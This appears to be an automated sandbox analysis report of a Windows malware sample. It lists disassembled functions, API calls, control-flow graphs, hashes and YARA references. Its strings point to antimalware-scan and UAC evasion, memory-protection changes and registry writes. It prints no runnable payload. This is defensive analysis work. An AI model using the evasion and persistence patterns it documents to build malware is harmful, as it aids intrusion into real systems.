                                                                                                                                                                                    • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                                                                                                                                                    • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                                                                                    • API String ID: 897696978-872072817
                                                                                                                                                                                    • Opcode ID: 809b9e96fa0e3c4351f23545bec2960a43143ac809834ba94826259c414d7509
                                                                                                                                                                                    • Instruction ID: 9e3ac1b8abfd2e23cc46ae9d13cf52d99a8a9b3f7fd558d5d95f0dab6a2e4dde
                                                                                                                                                                                    • Opcode Fuzzy Hash: 809b9e96fa0e3c4351f23545bec2960a43143ac809834ba94826259c414d7509
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA92EB79B24399CFCB14FB65D8809DD73B6AB4A704F5080E2A548EB654DBB0AEC1CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CADA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 10803 15cada34-15cada59 call 15ca1f86 10806 15cada5f 10803->10806 10807 15cadb83-15cadba9 call 15ca1f04 GetLongPathNameW call 15ca417e 10803->10807 10808 15cada9b-15cadaa0 10806->10808 10809 15cadb58-15cadb5d 10806->10809 10810 15cadb6e 10806->10810 10811 15cadb5f-15cadb6c call 15cdc0cf 10806->10811 10812 15cada70-15cada7e call 15cbb5b4 call 15ca1f13 10806->10812 10813 15cada91-15cada96 10806->10813 10814 15cadb51-15cadb56 10806->10814 10815 15cada66-15cada6b 10806->10815 10816 15cadaa5-15cadaac call 15cbbfb7 10806->10816 10833 15cadbae-15cadc1b call 15ca417e call 15caddd1 call 15ca2fa5 * 2 call 15ca1f09 * 5 10807->10833 10818 15cadb73-15cadb78 call 15cdc0cf 10808->10818 10809->10818 10810->10818 10811->10810 10830 15cadb79-15cadb7e call 15ca9057 10811->10830 10836 15cada83 10812->10836 10813->10818 10814->10818 10815->10818 10828 15cadaae-15cadafe call 15ca417e call 15cdc0cf call 15ca417e call 15ca2fa5 call 15ca1f13 call 15ca1f09 * 2 10816->10828 10829 15cadb00-15cadb4c call 15ca417e call 15cdc0cf call 15ca417e call 15ca2fa5 call 15ca1f13 call 15ca1f09 * 2 10816->10829 10818->10830 10842 15cada87-15cada8c call 15ca1f09 10828->10842 10829->10836 10830->10807 10836->10842 10842->10807
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LongNamePath
                                                                                                                                                                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                                    • API String ID: 82841172-425784914
                                                                                                                                                                                    • Opcode ID: eed1c3f6249b270c98b747fcff48a4c7d97f16700ff56c5249f16aefc2506912
                                                                                                                                                                                    • Instruction ID: f4f35dcd16d60dad3bc82940c2f51355144f9f919572a7aaa00648fb5da1cc5a
                                                                                                                                                                                    • Opcode Fuzzy Hash: eed1c3f6249b270c98b747fcff48a4c7d97f16700ff56c5249f16aefc2506912
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1641207B2082529BC314DE64EC50CAFBBA9AED5251F100D2EB545960A0FF60BE4DCB62
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CEAC49 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 10885 15ceac49-15ceac62 10886 15ceac78-15ceac7d 10885->10886 10887 15ceac64-15ceac74 call 15ce6766 10885->10887 10889 15ceac7f-15ceac87 10886->10889 10890 15ceac8a-15ceacae MultiByteToWideChar 10886->10890 10887->10886 10894 15ceac76 10887->10894 10889->10890 10892 15ceacb4-15ceacc0 10890->10892 10893 15ceae41-15ceae54 call 15cd4fcb 10890->10893 10895 15cead14 10892->10895 10896 15ceacc2-15ceacd3 10892->10896 10894->10886 10898 15cead16-15cead18 10895->10898 10899 15ceacd5-15ceace4 call 15cf7190 10896->10899 10900 15ceacf2-15cead03 call 15ce6137 10896->10900 10903 15cead1e-15cead31 MultiByteToWideChar 10898->10903 10904 15ceae36 10898->10904 10899->10904 10913 15ceacea-15ceacf0 10899->10913 10900->10904 10910 15cead09 10900->10910 10903->10904 10907 15cead37-15cead49 call 15ce8bb3 10903->10907 10908 15ceae38-15ceae3f call 15cd5e40 10904->10908 10915 15cead4e-15cead52 10907->10915 10908->10893 10914 15cead0f-15cead12 10910->10914 10913->10914 10914->10898 10915->10904 10917 15cead58-15cead5f 10915->10917 10918 15cead99-15ceada5 10917->10918 10919 15cead61-15cead66 10917->10919 10920 15ceada7-15ceadb8 10918->10920 10921 15ceadf1 10918->10921 10919->10908 10922 15cead6c-15cead6e 10919->10922 10923 15ceadba-15ceadc9 call 15cf7190 10920->10923 10924 15ceadd3-15ceade4 call 15ce6137 10920->10924 10925 15ceadf3-15ceadf5 10921->10925 10922->10904 10926 15cead74-15cead8e call 15ce8bb3 10922->10926 10929 15ceae2f-15ceae35 call 15cd5e40 10923->10929 10939 15ceadcb-15ceadd1 10923->10939 10924->10929 10941 15ceade6 10924->10941 10925->10929 10930 15ceadf7-15ceae10 call 15ce8bb3 10925->10930 10926->10908 10938 15cead94 10926->10938 10929->10904 10930->10929 10942 15ceae12-15ceae19 10930->10942 10938->10904 10943 15ceadec-15ceadef 10939->10943 10941->10943 10944 15ceae1b-15ceae1c 10942->10944 10945 15ceae55-15ceae5b 10942->10945 10943->10925 10946 15ceae1d-15ceae2d WideCharToMultiByte 10944->10946 10945->10946 10946->10929 10947 15ceae5d-15ceae64 call 15cd5e40 10946->10947 10947->10908
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,15CDEA24,15CDEA24,?,?,?,15CEAE9A,00000001,00000001,73E85006), ref: 15CEACA3
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,15CEAE9A,00000001,00000001,73E85006,?,?,?), ref: 15CEAD29
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 15CEAE23
                                                                                                                                                                                    • __freea.LIBCMT ref: 15CEAE30
                                                                                                                                                                                      • Part of subcall function 15CE6137: HeapAlloc.KERNEL32(00000000,15CD52BC,?,?,15CD8847,?,?,00000000,15D16B50,?,15CADE62,15CD52BC,?,?,?,?), ref: 15CE6169
                                                                                                                                                                                    • __freea.LIBCMT ref: 15CEAE39
                                                                                                                                                                                    • __freea.LIBCMT ref: 15CEAE5E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3147120248-0
                                                                                                                                                                                    • Opcode ID: 4f58f9f576f745a197e7bfaa09a21517f6d2a6d0b1096b67f44d0728677692ff
                                                                                                                                                                                    • Instruction ID: 2d269905bd93290eedbb50227aef9d37cd364173dbf191104c8e522f2b4503e6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f58f9f576f745a197e7bfaa09a21517f6d2a6d0b1096b67f44d0728677692ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7751D673710216AFDB158F78CC88EAB7FAAEB44750F114A69FD05D7140EBB4EC5486A0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03231724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 10950 3231724-3231736 10951 3231968-323196d 10950->10951 10952 323173c-323174c 10950->10952 10955 3231973-3231984 10951->10955 10956 3231a80-3231a83 10951->10956 10953 32317a4-32317ad 10952->10953 10954 323174e-323175b 10952->10954 10953->10954 10961 32317af-32317bb 10953->10961 10957 3231774-3231780 10954->10957 10958 323175d-323176a 10954->10958 10959 3231986-32319a2 10955->10959 10960 3231938-3231945 10955->10960 10962 3231684-32316ad VirtualAlloc 10956->10962 10963 3231a89-3231a8b 10956->10963 10967 3231782-3231790 10957->10967 10968 32317f0-32317f9 10957->10968 10964 3231794-32317a1 10958->10964 10965 323176c-3231770 10958->10965 10969 32319b0-32319bf 10959->10969 10970 32319a4-32319ac 10959->10970 10960->10959 10966 3231947-323195b Sleep 10960->10966 10961->10954 10971 32317bd-32317c9 10961->10971 10972 32316df-32316e5 10962->10972 10973 32316af-32316dc call 3231644 10962->10973 10966->10959 10974 323195d-3231964 Sleep 10966->10974 10980 32317fb-3231808 10968->10980 10981 323182c-3231836 10968->10981 10976 32319c1-32319d5 10969->10976 10977 32319d8-32319e0 10969->10977 10975 3231a0c-3231a22 10970->10975 10971->10954 10978 32317cb-32317de Sleep 10971->10978 10973->10972 10974->10960 10982 3231a24-3231a32 10975->10982 10983 3231a3b-3231a47 10975->10983 10976->10975 10987 32319e2-32319fa 10977->10987 10988 32319fc-32319fe call 32315cc 10977->10988 10978->10954 10986 32317e4-32317eb Sleep 10978->10986 10980->10981 10990 323180a-323181e Sleep 10980->10990 10984 32318a8-32318b4 10981->10984 10985 3231838-3231863 10981->10985 10982->10983 10991 3231a34 10982->10991 10994 3231a49-3231a5c 10983->10994 10995 3231a68 10983->10995 10996 32318b6-32318c8 10984->10996 10997 32318dc-32318eb call 32315cc 10984->10997 10992 3231865-3231873 10985->10992 10993 323187c-323188a 10985->10993 10986->10953 10998 3231a03-3231a0b 10987->10998 10988->10998 10990->10981 11000 3231820-3231827 Sleep 10990->11000 10991->10983 10992->10993 11001 3231875 10992->11001 11002 32318f8 10993->11002 11003 323188c-32318a6 call 3231500 10993->11003 11004 3231a5e-3231a63 call 3231500 10994->11004 11005 3231a6d-3231a7f 10994->11005 10995->11005 11006 32318ca 10996->11006 11007 32318cc-32318da 10996->11007 11009 32318fd-3231936 10997->11009 11015 32318ed-32318f7 10997->11015 11000->10980 11001->10993 11002->11009 11003->11009 11004->11005 11006->11007 11007->11009
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 032317D0
                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00000000), ref: 032317E6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                    • Opcode ID: 9ec5aecef1ccce6ba08b435a83687264f093c3f87781b465b5fc2d7b353e692c
                                                                                                                                                                                    • Instruction ID: 6058aa367e2eaf4aefd6e0f5fc4001c44d7fe619b7b08571f8ad3d9ac5a3f787
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ec5aecef1ccce6ba08b435a83687264f093c3f87781b465b5fc2d7b353e692c
                                                                                                                                                                                    • Instruction Fuzzy Hash: FFB136B66203519BDB15EF28EC88395FBE0EB86310F1CC6AED4459F389D770A4A1C790
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03247B20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45librarymemoryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,03247BA5,?,?,00000000,00000000), ref: 03247B61
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32,00000000,00000000,03247BA5,?,?,00000000,00000000), ref: 03247B67
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,03247BA5,?,?,00000000,00000000), ref: 03247B81
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                    • String ID: irtualProtect$kernel32
                                                                                                                                                                                    • API String ID: 2099061454-2063912171
                                                                                                                                                                                    • Opcode ID: d17b6581f444c1e40883b19b9f5451410a35e2ff41685483d35e593aef19682e
                                                                                                                                                                                    • Instruction ID: 4d179a82a603ddafe3c3d6f043d03455e8f322e55f732eaf8c894e3ba7499104
                                                                                                                                                                                    • Opcode Fuzzy Hash: d17b6581f444c1e40883b19b9f5451410a35e2ff41685483d35e593aef19682e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 100171B8210348BFD705FFA8DC41E5EB7ECEB4A710F604451F524E7640C774AA818A24
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03231A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 11029 3231a8c-3231a9b 11030 3231aa1-3231aa5 11029->11030 11031 3231b6c-3231b6f 11029->11031 11034 3231aa7-3231aae 11030->11034 11035 3231b08-3231b11 11030->11035 11032 3231b75-3231b7f 11031->11032 11033 3231c5c-3231c60 11031->11033 11036 3231b81-3231b8d 11032->11036 11037 3231b3c-3231b49 11032->11037 11040 3231c66-3231c6b 11033->11040 11041 32316e8-323170b call 3231644 VirtualFree 11033->11041 11038 3231ab0-3231abb 11034->11038 11039 3231adc-3231ade 11034->11039 11035->11034 11042 3231b13-3231b27 Sleep 11035->11042 11043 3231bc4-3231bd2 11036->11043 11044 3231b8f-3231b92 11036->11044 11037->11036 11051 3231b4b-3231b5f Sleep 11037->11051 11045 3231ac4-3231ad9 11038->11045 11046 3231abd-3231ac2 11038->11046 11048 3231af3 11039->11048 11049 3231ae0-3231af1 11039->11049 11059 3231716 11041->11059 11060 323170d-3231714 11041->11060 11042->11034 11050 3231b2d-3231b38 Sleep 11042->11050 11052 3231b96-3231b9a 11043->11052 11055 3231bd4-3231bd9 call 32314c0 11043->11055 11044->11052 11054 3231af6-3231b03 11048->11054 11049->11048 11049->11054 11050->11035 11051->11036 11056 3231b61-3231b68 Sleep 11051->11056 11057 3231bdc-3231be9 11052->11057 11058 3231b9c-3231ba2 11052->11058 11054->11032 11055->11052 11056->11037 11057->11058 11066 3231beb-3231bf2 call 32314c0 11057->11066 11062 3231bf4-3231bfe 11058->11062 11063 3231ba4-3231bc2 call 3231500 11058->11063 11064 3231719-3231723 11059->11064 11060->11064 11067 3231c00-3231c28 VirtualFree 11062->11067 11068 3231c2c-3231c59 call 3231560 11062->11068 11066->11058
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,03231FE4), ref: 03231B17
                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,03231FE4), ref: 03231B31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                    • Opcode ID: 22f6d565f474199912b0614384e4215dabc60ece08a3cd1fdb64ade07f46d4d0
                                                                                                                                                                                    • Instruction ID: 5fe7f360789defb18c5098973fd1843d5e1dbea284d7179065f0bb5a3e595d6c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 22f6d565f474199912b0614384e4215dabc60ece08a3cd1fdb64ade07f46d4d0
                                                                                                                                                                                    • Instruction Fuzzy Hash: B15121B16203418FE715EF68D984766BBE4AF47310F1885AED404CF28AE7B0E495C791
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0324C8AA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0324C9EA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CheckConnectionInternet
                                                                                                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                                                                                                    • Opcode ID: 8de112ffce6f3d9bdbc98ab4fc3aba5c301b783ba3c672db53e107d3ab14e0f7
                                                                                                                                                                                    • Instruction ID: defffb12cc0588fc6563370b71ee999817009f1dc8a2154e29db1321cd077fe7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8de112ffce6f3d9bdbc98ab4fc3aba5c301b783ba3c672db53e107d3ab14e0f7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46415279B30368AFDB04FFA9D840EDEB3F5EF49600F204462E450BB645DAB4AD818B50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CE8566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,15CE850D,?,00000000,00000000,00000000,?,15CE8839,00000006,FlsSetValue), ref: 15CE8598
                                                                                                                                                                                    • GetLastError.KERNEL32(?,15CE850D,?,00000000,00000000,00000000,?,15CE8839,00000006,FlsSetValue,15CFF160,15CFF168,00000000,00000364,?,15CE82E7), ref: 15CE85A4
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,15CE850D,?,00000000,00000000,00000000,?,15CE8839,00000006,FlsSetValue,15CFF160,15CFF168,00000000), ref: 15CE85B2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                    • Opcode ID: d1b18262ac000b3a3d121af144058672bebeead0f40af9a50a786a7d7f9e1a99
                                                                                                                                                                                    • Instruction ID: 47aa705f5ad1fb524d1e1f1913631165678ac9152b59a26f94566ab9a2f42af3
                                                                                                                                                                                    • Opcode Fuzzy Hash: d1b18262ac000b3a3d121af144058672bebeead0f40af9a50a786a7d7f9e1a99
                                                                                                                                                                                    • Instruction Fuzzy Hash: 890188326176369BD7118E698CA4D877F59FF05E617210965FD05D7180DF20D902CAE0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03245BE8 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 03245C44
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,03245D30,?,?,032438BC,00000001), ref: 03245C72
                                                                                                                                                                                      • Part of subcall function 03237D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000), ref: 03237D66
                                                                                                                                                                                      • Part of subcall function 03237F54: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,032438BC,03245CCD,00000000,03245D30,?,?,032438BC,00000001), ref: 03237F73
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,03245D30,?,?,032438BC,00000001), ref: 03245CD7
                                                                                                                                                                                      • Part of subcall function 0323A734: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0323C395,00000000,0323C3EF), ref: 0323A753
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 503785936-0
                                                                                                                                                                                    • Opcode ID: 292e29de54310bee85e70e5e24e274a2cceff507faf63075e1e9cf09a358020e
                                                                                                                                                                                    • Instruction ID: f9face9bd7d16d2a76535830d27a0a267b41a09416373ec434b5868969935ba4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 292e29de54310bee85e70e5e24e274a2cceff507faf63075e1e9cf09a358020e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7131B9B8A147049FDB00EFA5C8807EDBBF5AF4A704F908065D544AB380D7B49E45CBA1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0324D316 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,03295798), ref: 0324D35C
                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000510,00000000,00000000,00000001,00000000,0000001C), ref: 0324D394
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000510), ref: 0324D39F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 779948276-0
                                                                                                                                                                                    • Opcode ID: 7d2c2fedd28e8d3a64d7bd4c9d3f5f70f7595cbb7db47d9670b98c5be2e55f83
                                                                                                                                                                                    • Instruction ID: 4275ad96dc63f85461e3e28254106c6a6410cd7353df6ed813cae9ed5d749c8b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d2c2fedd28e8d3a64d7bd4c9d3f5f70f7595cbb7db47d9670b98c5be2e55f83
                                                                                                                                                                                    • Instruction Fuzzy Hash: A7112BB5624304AFDB01FB69DC91A9D7BECEB0A610B5044A1B418DB651E674EE808B60
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0324D318 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,03295798), ref: 0324D35C
                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000510,00000000,00000000,00000001,00000000,0000001C), ref: 0324D394
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000510), ref: 0324D39F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 779948276-0
                                                                                                                                                                                    • Opcode ID: 9c2a1adb58fa6bde9f9a105621470010a3cc2a960e14843f95067ed97c0b7784
                                                                                                                                                                                    • Instruction ID: 3f9451ecfa78cc42e6acbeaedae1e46ba02ebfe59954c85f87e643dc341c5e94
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c2a1adb58fa6bde9f9a105621470010a3cc2a960e14843f95067ed97c0b7784
